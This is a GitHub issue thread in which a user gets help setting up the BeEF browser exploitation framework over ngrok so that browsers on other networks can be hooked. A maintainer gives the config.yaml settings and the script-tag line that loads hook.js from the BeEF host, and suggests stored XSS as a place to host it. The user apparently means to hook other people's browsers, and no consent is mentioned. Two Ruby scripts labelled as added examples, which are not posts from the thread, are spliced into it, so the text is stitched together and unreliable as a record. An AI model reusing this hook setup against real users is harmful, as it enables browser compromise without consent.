beefproject / beef

The Browser Exploitation Framework Project
https://beefproject.com

. #1623

Closed sawce7 closed 6 years ago

sawce7 commented 6 years ago

Verify first that your issue/request has not been posted previously:

Ensure you're using the latest version of BeEF.

Environment

What version/revision of BeEF are you using? 0.4.7.0-0kali4
On what version of Ruby? Not sure what Ruby is used for. But before I had ngrok, BeEF would open.
On what browser? Firefox
On what operating system? Kali Linux 64bit

Configuration

Are you using a non-default configuration? Yes, I just changed "dns_host" and "db_host" in "/usr/share/beef-xss# leafpad config.yaml" to my public IP. For "cd extensions/metasploit/config.yaml" I changed "host" and "callback_host" to my public IP. I also changed:

# HTTP server
http:
    debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
    host: "0.0.0.0"
    port: "80"

I changed the default port above to "80" instead of "3000" because I am using ngrok and if I kept it at 3000, I wouldn't get a hook back from BeEF. I followed these:

https://github.com/beefproject/beef/issues/1489
https://null-byte.wonderhowto.com/how-to/beef-browser-exploitation-framework-project-over-wan-0168022/

Have you enabled or disabled any BeEF extensions? No

Summary

Please provide a summary of the issue. BeEF says it's "Unable to connect" after launching it. Also, I can't receive hooks while using ngrok. I have literally read every article on this and I can't figure it out. Please help me, I've been researching this problem all day.

Expected Behaviour

What was the expected result? To be able to receive hooks using ngrok and BeEF.

Actual Behavior

What was the actual result? BeEF not being able to load and not receiving hooks.

Steps to Reproduce

Please provide steps to reproduce this issue. N/A

Additional Information

Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots.

https://gyazo.com/d39c19b0ccc3794a1c42e885c10cc7cc

sawce7 commented 6 years ago

Also have read https://github.com/beefproject/beef/issues/1619 and basically every other BeEF and ngrok thread.

Also apt-get update && apt-get upgrade did not work either.

And I am still completely lost. Some help would be greatly appreciated. -Thank you

sawce7 commented 6 years ago

This is my config.yaml file for beef-xss right now. What should I be replacing with my public IP, etc.?

#
#   Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net
#   Browser Exploitation Framework (BeEF) - http://beefproject.com
#   See the file 'doc/COPYING' for copying permission
#

# BeEF Configuration file

beef:
version: '0.4.7.0-alpha'

# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80

# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
    user:   "beef"
    passwd: "beef"

# Interface / IP restrictions
restrictions:
    # subnet of IP addresses that can hook to the framework
    permitted_hooking_subnet: "0.0.0.0/0"
    # subnet of IP addresses that can connect to the admin UI
    #permitted_ui_subnet: "127.0.0.1/32"
    permitted_ui_subnet: "0.0.0.0/0"
    # slow API calls to 1 every  api_attempt_delay  seconds
    api_attempt_delay: "0.05"

# HTTP server
http:
    debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
    host: "0.0.0.0"
    port: "3000"

    # Decrease this setting to 1,000 (ms) if you want more responsiveness
    #  when sending modules and retrieving results.
    # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
    #  when hooking lots of browsers (50+).
    # Enabling WebSockets is generally better (beef.websocket.enable)
    xhr_poll_timeout: 1000

    # Host Name / Domain Name
    # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
    #   set the public hostname below:
    #public: ""      # public hostname/IP address

    # Reverse Proxy / NAT
    # If you want BeEF to be accessible behind a reverse proxy or NAT,
    #   set both the publicly accessible hostname/IP address and port below:
    #public: ""      # public hostname/IP address
    #public_port: "" # public port (experimental)

    # Web Admin user interface URI
    web_ui_basepath: "/ui"

    # Hook
    hook_file: "/hook.js"
    hook_session_name: "BEEFHOOK"
    session_cookie_name: "BEEFSESSION"

    # Allow one or multiple origins to access the RESTful API using CORS
    # For multiple origins use: "http://browserhacker.com, http://domain2.com"
    restful_api:
        allow_cors: false
        cors_allowed_domains: "http://browserhacker.com"

    # Prefer WebSockets over XHR-polling when possible.
    websocket:
        enable: false
        port: 61985 # WS: good success rate through proxies
        # Use encrypted 'WebSocketSecure'
        # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
        secure: true
        secure_port: 61986 # WSSecure
        ws_poll_timeout: 1000 # poll BeEF every second
        ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

    # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
    web_server_imitation:
        enable: true
        type: "apache" # Supported: apache, iis, nginx
        hook_404: false # inject BeEF hook in HTTP 404 responses
        hook_root: false # inject BeEF hook in the server home page
    # Experimental HTTPS support for the hook / admin / all other Thin managed web services
    https:
        enable: false
        # In production environments, be sure to use a valid certificate signed for the value
        # used in beef.http.public (the domain name of the server where you run BeEF)
        key: "beef_key.pem"
        cert: "beef_cert.pem"

database:
    # For information on using other databases please read the
    # README.databases file

    # supported DBs: sqlite, mysql, postgres
    # NOTE: you must change the Gemfile adding a gem require line like:
    #   gem "dm-postgres-adapter"
    # or
    #   gem "dm-mysql-adapter"
    # if you want to switch drivers from sqlite to postgres (or mysql).
    # Finally, run a 'bundle install' command and start BeEF.
    driver: "sqlite"

    # db_file is only used for sqlite
    db_file: "beef.db"

    # db connection information is only used for mysql/postgres
    db_host: "localhost"
    db_port: 3306
    db_name: "beef"
    db_user: "beef"
    db_passwd: "beef"
    db_encoding: "UTF-8"

# Autorun Rule Engine
autorun:
    # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
    # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
    # continue execution regardless of results.
    # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
    result_poll_interval: 300
    result_poll_timeout: 5000

    # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
    # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
    continue_after_timeout: true

# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false

# IP Geolocation
# NOTE: requires MaxMind database:
#   curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
#   gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
    enable: false
    database: '/opt/GeoIP/GeoLiteCity.dat'

# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
    phishing_frenzy:
        enable: false

# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
#       and can be enabled via their respective 'config.yaml' file
extension:
    admin_ui:
        enable: true
    demos:
        enable: true
    events:
        enable: true
    evasion:
        enable: false
    requester:
        enable: true
    proxy:
        enable: true
    network:
        enable: true
    metasploit:
        enable: false
    social_engineering:
        enable: true
    xssrays:
        enable: true
bcoles commented 6 years ago

"Unable to connect" is not something that BeEF says.

Your issue is with your network configuration or ngrok configuration.

A few other users have used ngrok and managed to get it working. You might find some useful information in one of the issues:

sawce7 commented 6 years ago

> "Unable to connect" is not something that BeEF says.
>
> Your issue is with your network configuration or ngrok configuration.
>
> A few other users have used ngrok and managed to get it working. You might find some useful information in one of the issues:

I've already read those threads and I still have no hope :(. I tried everything in those threads and it still won't hook with ngrok.

sawce7 commented 6 years ago

Completely reinstalled Kali Linux and started fresh, nothing touched other than ngrok downloaded. Can someone please give me a rundown on how I get BeEF to work with ngrok? I cannot port forward using my router because it's leased. Thank you

bcoles commented 6 years ago

No need to port forward.

Simply run ngrok:

$ ngrok http 3000

Then set the public facing host and port in config.yaml:

        public: "<your-id>.ngrok.io"      # public hostname/IP address
        public_port: "80"                 # public port (experimental) 
sawce7 commented 6 years ago

> No need to port forward.
>
> Simply run ngrok:
>
> $ ngrok http 3000
>
> Then set the public facing host and port in config.yaml:
>
>         public: "<your-id>.ngrok.io"      # public hostname/IP address
>         public_port: "80"                 # public port (experimental)

So for the "public": that should be the http: link I get out of ngrok, correct?

bcoles commented 6 years ago

> So for the "public": that should be the http: link I get out of ngrok, correct?

yes

sawce7 commented 6 years ago

> So for the "public": that should be the http: link I get out of ngrok, correct?
>
> yes

OK, after doing that, I had my friend open the link and it would not load for him; it said "site could not be reached." Any ideas?

bcoles commented 6 years ago

"Site could not be reached" is rather vague. What does that mean exactly?

Why not try opening the link yourself?

sawce7 commented 6 years ago

This site can’t be reached 78405525.ngrok.io took too long to respond. Search Google for 78405525 ngrok 3000 demos butcher index ERR_CONNECTION_TIMED_OUT

bcoles commented 6 years ago

http://78405525.ngrok.io/

sawce7 commented 6 years ago

So after using ngrok, when I open the advanced link to the meat site, 127.0.0.1:3000/demos/butcher/index.html, if I would want to send this to someone on another wifi I should replace the 127.0.0.1 with the http link from ngrok http 3000, correct?

bcoles commented 6 years ago

You know how when you start ngrok it gives you three URLs?

One is for the web interface. Ignore it. There's two others. One is HTTP, the other is HTTPS. Open the HTTP link.

sawce7 commented 6 years ago

I opened it and it brings me to an Apache 2 Test Page. Sorry for asking so much, I am a noob haha! I have just been struggling with this for so long now and I have tried so many threads and restarted so many times.

bcoles commented 6 years ago

That means it's working. Congratulations.

sawce7 commented 6 years ago

So if I would want to retrieve a hook on beef, how would I do so?

bcoles commented 6 years ago

If the Demos extension is enabled, you can load the demo page at /demos/basic.html

sawce7 commented 6 years ago

I don't think it is enabled; it's saying it's not a directory. Do I enable this through the config.yaml from beef-xss?

bcoles commented 6 years ago

glhf

sawce7 commented 6 years ago

It is enabled, how would I go along sending a link to a user and receiving a hook?

sawce7 commented 6 years ago

It now loads on another wifi, but now it says hook.js has a 500 Internal Server Error in ngrok.

bcoles commented 6 years ago

> It is enabled, how would I go along sending a link to a user and receiving a hook?

When BeEF starts, it prints the hook URL to console:

[14:07:32]    |   Hook URL: http://beef.ngrok.io:80/hook.js
[14:07:32]    |_  UI URL:   http://beef.ngrok.io:80/ui/panel

The Hook URL is the URL to hook a browser. To hook a browser, you will need the browser to execute the hook. This can be achieved by making use of the <script> HTML tag. The following HTML can be used to make a browser execute the hook JavaScript code:

<script src="http://beef.ngrok.io:80/hook.js"></script>

If a browser navigates to a page containing the above HTML, the browser will load and execute the hook JavaScript.

sawce7 commented 6 years ago

Ok, So I should be replacing the current hook url too

bcoles commented 6 years ago

> It now loads on another wifi, but now it says hook.js has a 500 Internal Server Error in ngrok.

Make sure your BeEF is up to date.

If you still receive the HTTP 500 error, and you're using BeEF from an operating system package, such as the beef-xss package on Kali, then you'll need to refer your issue to the package maintainers.

Alternatively, you can try downloading BeEF from GitHub:

git clone https://github.com/beefproject/beef
cd beef
./install
sawce7 commented 6 years ago

OK, thank you, one more question. If I would want to replace the current hook URL, I would use the Apache2 index.html, right?

bcoles commented 6 years ago

I don't know what that means

sawce7 commented 6 years ago

> I don't know what that means

Where do I need to go to locate and change the hook url and ui url.

bcoles commented 6 years ago

https://github.com/beefproject/beef/wiki/Configuration

In config.yaml:

        web_ui_basepath: "/ui" # Path for admin UI
        hook_file: "/hook.js" # Path for hooking script
sawce7 commented 6 years ago

I implemented http://beef.ngrok.io:80/ui/panel for the web_ui. Where do I enter the script?

# Web Admin user interface URI
web_ui_basepath: "http://beef.ngrok.io:80/ui/panel"

# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"

bcoles commented 6 years ago

no

sawce7 commented 6 years ago

Sorry I am confused on the script part because various websites are giving me completely different information.

sawce7 commented 6 years ago

https://forums.kali.org/showthread.php?23861-Tutorial-Easy-Beef-XSS-hook

bcoles commented 6 years ago

Do not use beef.ngrok.io - use your actual ngrok host name.

Do not use a full URL in web_ui_basepath. Use a path, like /path/to/panel
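The two configuration points made in this thread (set `public` to the bare ngrok host name with `public_port: "80"`, and keep `web_ui_basepath` and `hook_file` as paths rather than URLs) can be checked mechanically. The Ruby script below is an added example, not BeEF's own code: it loads a constructed `config.yaml` fragment, reports the mistakes discussed above, and rebuilds the hook and UI URLs in the same `http://<public>:<public_port>/hook.js` shape BeEF prints at start-up. The host name `example-id.ngrok.io` and the allow/deny rules are assumptions made for the example.

```ruby
# Added example (not BeEF's own code): sanity-check the http: section of a
# BeEF config.yaml for the mistakes discussed in this thread, then build the
# hook and UI URLs the way BeEF prints them at start-up
# (http://<public>:<public_port>/hook.js). The YAML below is a constructed
# sample; the host name is a placeholder, not a real deployment.
require 'yaml'

SAMPLE_CONFIG = <<~YAML
  beef:
      http:
          host: "0.0.0.0"
          port: "3000"
          public: "example-id.ngrok.io"   # placeholder ngrok host name
          public_port: "80"
          web_ui_basepath: "/ui"
          hook_file: "/hook.js"
YAML

def load_http_section(yaml_text)
  YAML.safe_load(yaml_text).fetch('beef').fetch('http')
end

# Returns an array of human-readable problems; empty means the section looks sane.
def check_http_section(http)
  problems = []
  pub = http['public'].to_s
  if pub.empty?
    problems << 'public is not set: remote browsers would be told to fetch hook.js from the LAN address'
  elsif pub.include?('://') || pub.include?('/')
    problems << 'public must be a bare host name, not a URL (no scheme, no path)'
  elsif pub.start_with?('<') || pub == 'beef.ngrok.io'
    problems << "public is still the placeholder #{pub.inspect}; use the host name ngrok actually printed"
  end
  if !pub.empty? && http['public_port'].to_s.empty?
    problems << 'public_port is not set; ngrok exposes HTTP on port 80 while BeEF listens on 3000 locally'
  end
  # Both of these must be absolute paths on the BeEF server, never full URLs.
  %w[web_ui_basepath hook_file].each do |key|
    val = http[key].to_s
    if val.include?('://') || !val.start_with?('/')
      problems << "#{key} must be an absolute path such as /ui or /hook.js, not #{val.inspect}"
    end
  end
  problems
end

# Hook and UI URLs as BeEF would print them, falling back to the bind
# address and port when no public host name is configured (local-only install).
def public_urls(http)
  local_only = http['public'].to_s.empty?
  host = local_only ? http['host'] : http['public']
  port = local_only ? http['port'] : http['public_port']
  base = "http://#{host}:#{port}"
  { hook: base + http['hook_file'], ui: base + http['web_ui_basepath'] + '/panel' }
end

if __FILE__ == $PROGRAM_NAME
  http = load_http_section(SAMPLE_CONFIG)
  check_http_section(http).each { |p| warn "config problem: #{p}" }
  urls = public_urls(http)
  puts "Hook URL: #{urls[:hook]}"
  puts "UI URL:   #{urls[:ui]}"
end
```

Run it against the real file by replacing `SAMPLE_CONFIG` with `File.read('config.yaml')`; the section is read under the top-level `beef:` key, which the pasted configs in this thread have lost through indentation stripping, so re-indent before feeding them in.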

bcoles commented 6 years ago

The BeEF hook file is JavaScript code. It's dynamically generated at run time and hosted on the BeEF web server.

To hook a browser, you will need the browser to execute the hook code. This can be achieved by making use of the <script> HTML tag. The following HTML can be used to make a browser execute the hook JavaScript code:

<script src="http://beef.ngrok.io:80/hook.js"></script>

If a browser navigates to a page containing the above HTML, the browser will load and execute the hook JavaScript.

You can host that HTML code anywhere you like, so long as it's served with an executable Content-Type header, such as Content-Type: text/html
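Seen from the other side, a site owner who wants to know whether one of their own pages carries an injected include of this kind can look for exactly the pattern described above: a `<script src=...>` whose source is an absolute URL on a host they do not control. The Ruby script below is an added example, not part of BeEF or of this thread; the HTML, the allow-list of first-party script hosts (`www.example.com`, `cdn.example.com`) and the `example-id.ngrok.io` host name are constructed sample input.

```ruby
# Added example (not BeEF's own code): flag externally sourced <script> tags in
# HTML you serve, as a site owner checking for an injected hook include would.
# Any absolute script URL whose host is not on the allow-list is reported, and
# ones whose path ends in hook.js are highlighted. HTML, allow-list and host
# names below are constructed sample data.
require 'uri'

ALLOWED_SCRIPT_HOSTS = %w[www.example.com cdn.example.com].freeze

SAMPLE_HTML = <<~HTML
  <html><head>
    <script src="https://cdn.example.com/app.js"></script>
    <script src="/local/analytics.js"></script>
    <script src="http://example-id.ngrok.io:80/hook.js"></script>
    <script>console.log("inline");</script>
  </head><body>Hello</body></html>
HTML

# Captures the src attribute of every <script ... src="..."> tag.
SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/i

# Returns one finding hash per script include loaded from a non-allow-listed host.
def find_external_scripts(html, allowed_hosts = ALLOWED_SCRIPT_HOSTS)
  html.scan(SCRIPT_SRC_RE).flatten.each_with_object([]) do |src, findings|
    uri = begin
      URI.parse(src)
    rescue URI::InvalidURIError
      nil
    end
    # Relative or unparsable src values are same-origin; they are not what we look for here.
    next if uri.nil? || uri.host.nil?
    next if allowed_hosts.include?(uri.host.downcase)
    findings << {
      src: src,
      host: uri.host,
      plain_http: uri.scheme == 'http',
      hook_like: File.basename(uri.path.to_s) == 'hook.js'
    }
  end
end

if __FILE__ == $PROGRAM_NAME
  find_external_scripts(SAMPLE_HTML).each do |f|
    tag = f[:hook_like] ? 'HOOK-LIKE' : 'external'
    puts "#{tag} script from #{f[:host]}#{f[:plain_http] ? ' (plain http)' : ''}: #{f[:src]}"
  end
end
```

The regex is deliberately simple and only covers the `<script src>` form shown in this thread; a full audit of a page's script sources should parse the DOM and include `document.write`-style injection, which this example does not attempt.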

sawce7 commented 6 years ago

Hook URL:

and I should implement this into index.html

bcoles commented 6 years ago

You'll need the URL scheme http://.

You can host it wherever you like.

sawce7 commented 6 years ago

Ok, where is the most ideal place to host it?

bcoles commented 6 years ago

Stored XSS on google.com

sawce7 commented 6 years ago

Implemented the hook URL script into the demo page; it loads the butcher page on another wifi but I'm still getting the hook.js 500 internal server error.

The link I tested on another wifi and copied into a browser was: http://3783cj83.ngrok.io/demos/butcher/index.html

bcoles commented 6 years ago

Make sure your BeEF is up to date.

If you still receive the HTTP 500 error, and you're using BeEF from an operating system package, such as the beef-xss package on Kali, then you'll need to refer your issue to the package maintainers.

Alternatively, you can try downloading BeEF from GitHub:

git clone https://github.com/beefproject/beef
cd beef
./install
sawce7 commented 6 years ago

I cloned it. This time ngrok says "hook.js 200 OK" but there is nothing new in my UI?

bcoles commented 6 years ago

Was a new hooked browser reported in the console?

bcoles commented 6 years ago

Did you configure the config.yaml file in the new clone?

sawce7 commented 6 years ago

It was the same configurations after I cloned it.

sawce7 commented 6 years ago

Can I email you my config? Or PM you.

sawce7 commented 6 years ago

Or am I good to just post it on here.

bcoles commented 6 years ago

Try eliminating ngrok from the equation. Make sure BeEF is working locally first.

sawce7 commented 6 years ago

#
#   Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
#   Browser Exploitation Framework (BeEF) - http://beefproject.com
#   See the file 'doc/COPYING' for copying permission
#

# BeEF Configuration file

beef:
version: '0.4.7.0-alpha'

# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80

# Interface / IP restrictions
restrictions:
    # subnet of IP addresses that can hook to the framework
    permitted_hooking_subnet: "0.0.0.0/0"
    # subnet of IP addresses that can connect to the admin UI
    #permitted_ui_subnet: "127.0.0.1/32"
    permitted_ui_subnet: "0.0.0.0/0"

# HTTP server
http:
    debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
    host: "0.0.0.0"
    port: "3000"

    # Decrease this setting to 1,000 (ms) if you want more responsiveness
    #  when sending modules and retrieving results.
    # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
    #  when hooking lots of browsers (50+).
    # Enabling WebSockets is generally better (beef.websocket.enable)
    xhr_poll_timeout: 1000

    # Reverse Proxy / NAT
    # If BeEF is running behind a reverse proxy or NAT
    #  set the public hostname and port here
    #public: "ngork host name"     # public hostname/IP address
    #public_port: "80" # experimental

    # DNS
    dns_host: "my public ip"
    dns_port: 53

    # Web Admin user interface URI
    web_ui_basepath: "/ui"

    # Hook
    hook_file: "/hook.js"
    hook_session_name: "BEEFHOOK"
    session_cookie_name: "BEEFSESSION"

    # Allow one or multiple origins to access the RESTful API using CORS
    # For multiple origins use: "http://browserhacker.com, http://domain2.com"
    restful_api:
        allow_cors: false
        cors_allowed_domains: "http://browserhacker.com"

    # Prefer WebSockets over XHR-polling when possible.
    websocket:
        enable: false
        port: 61985 # WS: good success rate through proxies
        # Use encrypted 'WebSocketSecure'
        # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
        secure: true
        secure_port: 61986 # WSSecure
        ws_poll_timeout: 1000 # poll BeEF every second

    # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
    web_server_imitation:
        enable: true
        type: "apache" # Supported: apache, iis, nginx
        hook_404: false # inject BeEF hook in HTTP 404 responses
        hook_root: false # inject BeEF hook in the server home page
    # Experimental HTTPS support for the hook / admin / all other Thin managed web services
    https:
        enable: false
        # In production environments, be sure to use a valid certificate signed for the value
        # used in beef.http.dns_host (the domain name of the server where you run BeEF)
        key: "beef_key.pem"
        cert: "beef_cert.pem"

database:
    # For information on using other databases please read the
    # README.databases file

    # supported DBs: sqlite, mysql, postgres
    # NOTE: you must change the Gemfile adding a gem require line like:
    #   gem "dm-postgres-adapter"
    # or
    #   gem "dm-mysql-adapter"
    # if you want to switch drivers from sqlite to postgres (or mysql).
    # Finally, run a 'bundle install' command and start BeEF.
    driver: "sqlite"

    # db_file is only used for sqlite
    db_file: "db/beef.db"

    # db connection information is only used for mysql/postgres
    db_host: "my public ip"
    db_port: 3306
    db_name: "beef"
    db_user: "beef"
    db_passwd: "beef"
    db_encoding: "UTF-8"

# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin_UI extension
credentials:
    user:   "beef"
    passwd: "beef"

# Autorun Rule Engine
autorun:
    # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
    # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
    # continue execution regardless of results.
    # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
    result_poll_interval: 300
    result_poll_timeout: 5000

    # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
    # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
    continue_after_timeout: true

# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false

# IP Geolocation
# NOTE: requires MaxMind database:
#   curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
#   gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
    enable: false
    database: '/opt/GeoIP/GeoLiteCity.dat'

# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
    phishing_frenzy:
        enable: false

# You may override default extension configuration parameters here
extension:
    requester:
        enable: true
    proxy:
        enable: true
        key: "beef_key.pem"
        cert: "beef_cert.pem"
    metasploit:
        enable: false
    social_engineering:
        enable: true
    evasion:
        enable: false
    console:
         shell:
            enable: false
    ipec:
        enable: true
    # this is still experimental..
    # Disable it in kali because it doesn't work with the current
    # version of ruby-rubydns (older version is required by beef-xss)
    dns:
        enable: false
    # this is still experimental..
    dns_rebinding:
        enable: false
sawce7 commented 6 years ago

Anything I need to change here? My public IP is actually there on my side and same goes for the public.